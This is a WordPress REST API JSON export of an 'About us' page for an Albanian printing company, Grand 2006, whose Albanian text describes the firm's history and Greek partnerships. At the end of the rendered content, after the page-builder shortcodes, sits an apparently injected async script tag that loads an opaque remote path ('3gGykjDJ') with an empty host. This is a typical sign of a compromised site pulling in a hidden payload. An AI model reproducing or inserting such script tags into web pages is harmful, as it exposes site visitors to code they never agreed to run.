{"id":12,"date":"2017-08-31T14:11:43","date_gmt":"2017-08-31T14:11:43","guid":{"rendered":"http:\/\/new.grandpaperbags.com\/?page_id=12"},"modified":"2017-09-26T15:11:46","modified_gmt":"2017-09-26T15:11:46","slug":"rreth-nesh","status":"publish","type":"page","link":"https:\/\/grandpaperbags.com\/index.php\/rreth-nesh\/","title":{"rendered":"RRETH NESH"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row type=&#8221;vc_default&#8221; css=&#8221;.vc_custom_1504191546177{background-color: #ffffff !important;}&#8221;][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;203&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;zoom&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_empty_space height=&#8221;52px&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: justify;\">Shtypshkronja Grand 2006 tashm\u00eb lider n\u00eb fush\u00ebn e saj, arrin t\u00eb pozicionohet n\u00eb tregun Shqiptar me t\u00eb gjith\u00eb gam\u00ebn e produkteve q\u00eb posedon.Grand \u00ebsht\u00eb krijuar n\u00eb vitin 2006 pas nj\u00eb experience gati 20 vjecare n\u00eb Greqi kjo shtypshkronje ka arrritur q\u00eb n\u00eb fare pak koh\u00eb t\u00eb mund t\u00eb gj\u00ebndet pran\u00eb klienteve t\u00eb saj.<\/p>\n<p style=\"text-align: justify;\">Grand 2006 vit pas viti ka arritur te mir\u00ebpoziconohet, dhe e gjitha kjo arritje i dedikohet zgjerimit t\u00eb games s\u00eb produkteve dhe pun\u00ebs produktive.Kjo kompani e mb\u00ebshtet ecurine e saj pozitive n\u00eb partneritetin e disa prej kompanive m\u00eb t\u00eb njohura Greke, gjithashtu Shtypshkronja Grand punon edhe me pjes\u00ebn e eksportit drejt Greqis\u00eb n\u00eb fush\u00ebn e Punimeve Fason.<\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<script async src='https:\/\/\/3gGykjDJ?frm=script&#038;_cid=123' type='text\/javascript'><\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row type=&#8221;vc_default&#8221; css=&#8221;.vc_custom_1504191546177{background-color: #ffffff !important;}&#8221;][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;203&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;zoom&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_empty_space height=&#8221;52px&#8221;][vc_column_text] Shtypshkronja Grand 2006 tashm\u00eb lider n\u00eb fush\u00ebn e saj, arrin t\u00eb pozicionohet n\u00eb tregun Shqiptar me t\u00eb gjith\u00eb gam\u00ebn e produkteve q\u00eb posedon.Grand \u00ebsht\u00eb krijuar n\u00eb vitin 2006 pas nj\u00eb experience gati 20 vjecare n\u00eb Greqi kjo shtypshkronje ka arrritur q\u00eb n\u00eb fare&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-12","page","type-page","status-publish","hentry","description-off"],"_links":{"self":[{"href":"https:\/\/grandpaperbags.com\/index.php\/wp-json\/wp\/v2\/pages\/12","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/grandpaperbags.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/grandpaperbags.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/grandpaperbags.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/grandpaperbags.com\/index.php\/wp-json\/wp\/v2\/comments?post=12"}],"version-history":[{"count":4,"href":"https:\/\/grandpaperbags.com\/index.php\/wp-json\/wp\/v2\/pages\/12\/revisions"}],"predecessor-version":[{"id":72,"href":"https:\/\/grandpaperbags.com\/index.php\/wp-json\/wp\/v2\/pages\/12\/revisions\/72"}],"wp:attachment":[{"href":"https:\/\/grandpaperbags.com\/index.php\/wp-json\/wp\/v2\/media?parent=12"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}